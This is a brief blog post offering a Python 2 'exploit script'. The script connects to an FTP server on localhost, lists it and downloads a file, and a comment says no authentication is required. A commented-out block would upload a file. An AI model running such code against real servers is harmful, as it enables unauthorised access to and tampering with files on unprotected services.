Python – exploit script

import ftplib
import os
# Connect to server
ftp = ftplib.FTP( "127.0.0.1" )
ftp.set_pasv( False )
# Note that we need no authentication at all!!
print ftp.retrlines( 'LIST' )
print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write )
# filename = 'test.txt'
# f = open( filename, 'rb' )
# print ftp.storbinary( 'STOR ' + filename, f )
# f.close()
ftp.quit()
This entry was posted in applications, General, security and tagged . Bookmark the permalink. Both comments and trackbacks are currently closed.